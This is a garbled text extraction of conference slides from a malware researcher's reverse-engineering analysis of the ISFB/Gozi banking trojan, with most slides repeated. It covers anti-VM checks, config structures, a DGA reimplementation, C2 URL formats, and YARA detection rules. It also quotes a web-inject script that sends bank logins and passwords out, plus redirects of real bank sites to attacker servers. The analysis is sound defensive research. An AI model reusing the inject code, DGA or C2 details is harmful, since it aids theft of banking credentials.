Embed Size (px)
Citation preview
02122016 ISFB
httpslokalhostpltalksbotconf20161 158
ISFBStill Live and Kicking
Maciej Kotowicz
02122016 ISFB
httpslokalhostpltalksbotconf20161 258
Intro
02122016 ISFB
httpslokalhostpltalksbotconf20161 358
$ whois makMaciej Kotowicz
Principal Malware Researcher CERTplDragonSector CTFREExploit devAutomatization Formal methodsmaciekkotowicz
middotmiddotmiddotmiddotmiddot
358
02122016 ISFB
httpslokalhostpltalksbotconf20161 458
Disclaimer
Based on proposed plan author did some source codeanalysis and want to summarize his
Well Nope 75 of this came from Reverse Engineering
458
ISFB long story short
02122016 ISFB
httpslokalhostpltalksbotconf20161 558
ISFB long story short
Based on gozisame bugs going back to 2007UrsnifGoziGozi2RovnixVawtrakCasual history with rovnixFor us public appearence in 2014Now one of most puplar bankers on marketCouple of offsprings
middotmiddotmiddotmiddotmiddotmiddotmiddot
558
02122016 ISFB
httpslokalhostpltalksbotconf20161 658
ISFB
UrsnifGoziGozi2RovnixVawtrak
DbgPrint(ISFB_04x Installer DLL finished with status un GetCurrentProcessId() Status)C
ISFB project Version 213241 module dllc $Revision 265 $
658
02122016 ISFB
httpslokalhostpltalksbotconf20161 758
Scale
(n6 sinkhole connections in october - bankers only)
758
02122016 ISFB
httpslokalhostpltalksbotconf20161 858
Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]
858
02122016 ISFB
httpslokalhostpltalksbotconf20161 958
Scale
958
Scale
02122016 ISFB
httpslokalhostpltalksbotconf20161 1058
Scalekudos to Slavo (SWITCH-CERT)
1058
02122016 ISFB
httpslokalhostpltalksbotconf20161 1158
The Dropperor where the acients reside
02122016 ISFB
httpslokalhostpltalksbotconf20161 1258
Welcome to the system
achieve persistencyinject workersetup IPCnew download 2nd stage
middotmiddotmiddotmiddot
1258
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 258
Intro
02122016 ISFB
httpslokalhostpltalksbotconf20161 358
$ whois makMaciej Kotowicz
Principal Malware Researcher CERTplDragonSector CTFREExploit devAutomatization Formal methodsmaciekkotowicz
middotmiddotmiddotmiddotmiddot
358
02122016 ISFB
httpslokalhostpltalksbotconf20161 458
Disclaimer
Based on proposed plan author did some source codeanalysis and want to summarize his
Well Nope 75 of this came from Reverse Engineering
458
ISFB long story short
02122016 ISFB
httpslokalhostpltalksbotconf20161 558
ISFB long story short
Based on gozisame bugs going back to 2007UrsnifGoziGozi2RovnixVawtrakCasual history with rovnixFor us public appearence in 2014Now one of most puplar bankers on marketCouple of offsprings
middotmiddotmiddotmiddotmiddotmiddotmiddot
558
02122016 ISFB
httpslokalhostpltalksbotconf20161 658
ISFB
UrsnifGoziGozi2RovnixVawtrak
DbgPrint(ISFB_04x Installer DLL finished with status un GetCurrentProcessId() Status)C
ISFB project Version 213241 module dllc $Revision 265 $
658
02122016 ISFB
httpslokalhostpltalksbotconf20161 758
Scale
(n6 sinkhole connections in october - bankers only)
758
02122016 ISFB
httpslokalhostpltalksbotconf20161 858
Scale gt dbconfigdistinct(keytypeisfbexe_typeworker) [ q1a2z3w4s5x6e7d8 S951DX7IZXHH4Y6P OvZz8XVH91INT7ek V86iYRDA2FSEqWzL 87694321POIRYTRI 77694321POIRYTRI DB23B3470D0CF889 A79CE7E04B4C9A6A byVMLEDZAlowtPY 0123456789ABCDEF 2345D892B97F02A Drbp2YVKMWkmPGtJ Dfei8OoQ0xhjTyql 0WADGyh7SUCs1i2V PHZ4OVL2QLI0N8WN ]
858
02122016 ISFB
httpslokalhostpltalksbotconf20161 958
Scale
958
Scale
02122016 ISFB
httpslokalhostpltalksbotconf20161 1058
Scalekudos to Slavo (SWITCH-CERT)
1058
02122016 ISFB
httpslokalhostpltalksbotconf20161 1158
The Dropperor where the acients reside
02122016 ISFB
httpslokalhostpltalksbotconf20161 1258
Welcome to the system
achieve persistencyinject workersetup IPCnew download 2nd stage
middotmiddotmiddotmiddot
1258
02122016 ISFB
httpslokalhostpltalksbotconf20161 1358
Useless strings
1358
02122016 ISFB
httpslokalhostpltalksbotconf20161 1458
One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)
1458
02122016 ISFB
httpslokalhostpltalksbotconf20161 1558
Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)
C
1558
Anti-VM
02122016 ISFB
httpslokalhostpltalksbotconf20161 1658
Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)
C
1658
02122016 ISFB
httpslokalhostpltalksbotconf20161 1758
String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12
C
1758
02122016 ISFB
httpslokalhostpltalksbotconf20161 1858
Joined resourcesor FJ-structs
typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem
C
1858
02122016 ISFB
httpslokalhostpltalksbotconf20161 1958
Joined resourcesor J1-structs
typedef struct DWORD j1_magic DWORD flags can be aPLib packed DWORD crc32_name DWORD addr DWORD size isfb_fj_elem
C
‐ 0x4F75CEA70x9e154a0c CRC_CLIENT32 ‐ 0xD722AFCB0x8365B9570x8fb1dde1 CRC_CLIENT_INI ‐ 0xE1285E64 CRC_PUBLIC_KEY ‐ 0x90F8AAB40x41982e1f CRC_CLIENT64 ‐ 0x7A042A8A NEW ‐ UNKNOWN
1958
02122016 ISFB
httpslokalhostpltalksbotconf20161 2058
Static configuration typedef struct DWORD off DWORD flags QWORD value QWORD uid isfb_cfg_elem typedef struct QWORD count isfb_cfg_elem[count] char string_table[]
C
2058
Static cfg - fields
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
